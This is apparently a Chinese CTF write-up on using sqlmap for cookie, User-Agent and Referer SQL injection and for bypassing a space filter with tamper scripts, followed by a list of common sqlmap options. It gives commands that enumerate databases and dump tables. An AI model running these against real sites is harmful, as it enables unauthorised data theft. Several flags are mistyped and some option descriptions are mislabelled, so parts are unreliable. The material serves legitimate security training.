做蛋白go分析网站,手机购物网站 设计,wordpress图片主题下载,怎么增加网站的外链注:level参数
使用–batch参数可指定payload测试复杂等级。共有五个级别#xff0c;从1-5#xff0c;默认值为1。等级越高#xff0c;测试的payload越复杂#xff0c;当使用默认等级注入不出来时#xff0c;可以尝试使用–level来提高测试等级。
--level 参数决定了 sql…注:level参数
使用–batch参数可指定payload测试复杂等级。共有五个级别从1-5默认值为1。等级越高测试的payload越复杂当使用默认等级注入不出来时可以尝试使用–level来提高测试等级。
--level 参数决定了 sqlmap 在检测 SQL 注入时的 “努力程度”。
level 1默认的 level 等级会测试 GET 和 POST 请求中的参数。level 2除了前面提到的还会检查 cookie 里的数据。level 3user-agent 和 referer 头部也纳入检测范围。level 4~5会尝试各种 payloads 和边界条件确保不放过任何潜在的注入点。
1.cookie注入
1)进入题目环境然后页面显示是cookie注入那应该跟cookie头有关了 2)用BP抓包 3然后把抓到的信息存成txt文件 4然后用sqlmap查看是否有sql注入
sqlmap -r “文件地址” 5从扫描结果可以看出这里它是使用了cookie注入
然后我们查看一下它的数据库
sqlmap -r ‘文件地址’ --dbs 6查到它有四个库一次查看后有用数据在sqli里
查看它里面表的数据sqlmap -r ‘文件地址’ -D sqli --tables --batch 7然后再查看表里的字段信息
sqlmap -r ‘文件地址’ -D sqli -T ydinnlywvm --dump --batch 然后便能找到flag
2.UA注入
1进入题目环境页面显示注入类型为UA注入 2跟跟上面的cookie注入类似先用BP抓包然后将它保存 3接着用sqlmap测试注入类型及注入点
sqlmap -u 网址 -level 3 --dbs 4)扫出它的数据库然后依次查看里面的内容依然是在sqli表里
查看里面的数据
sqlmap -u 网址 level 3 -D sqli --tables --dbs 5找到表里有两个字段查看第一个
sqlmap -u 网址 -level 3 -D sqli -T irdofixdml --dump --batch 然后找到flag
3.Refer注入
1进入题目环境 2说是refer注入那肯定跟refer头有关了sqlmap扫描应该是要用到level 3 将refer头纳入检测范围了
sqlmap -u 网址 -level 3 --dbs 3扫出数据库然后查表查到在sqli里面
sqlmap -u “网址” -D sqli --tables --batch 4然后扫描字段数据
sqlmap -u “网址” -D sqli -T uggursvczx --dump --batch 4.过滤空格
1进入环境说是空格被过滤 2用sqlmap扫描时需要用到sqlmap的脚本 space2comment.py 用/**/替换空格符 注入命令
sqlmap -u 网址--current-db --tamperspace2comment.py 3扫出sqli然后看表里内容得到flag
sqlmap -u 网址 -D sqli --dump --tamperspace2comment.py --batch --tamperspace2plus.py 5.小结 SQLmap内置了很多绕过脚本在 /usr/share/sqlmap/tamper/ 目录下 脚本按照用途命名比如 space2comment.py 是指用/**/代替空格。
常见需要注意的一些命令
--batch 默认确认不再询问是否确认。
--methodGET 指定请求方式GET/POST
--random-agent 随机切换UAUser-Agent
--user-agent 使用自定义的UAUser-Agent
--referer 使用自定义的 referer
--proxy127.0.0.1:8080 指定代理
--threads 10 设置线程数最高10
--level1 执行测试的等级1-5默认为1常用3
--risk1 风险级别0~3默认1常用1级别提高会增加数据被篡改的风险。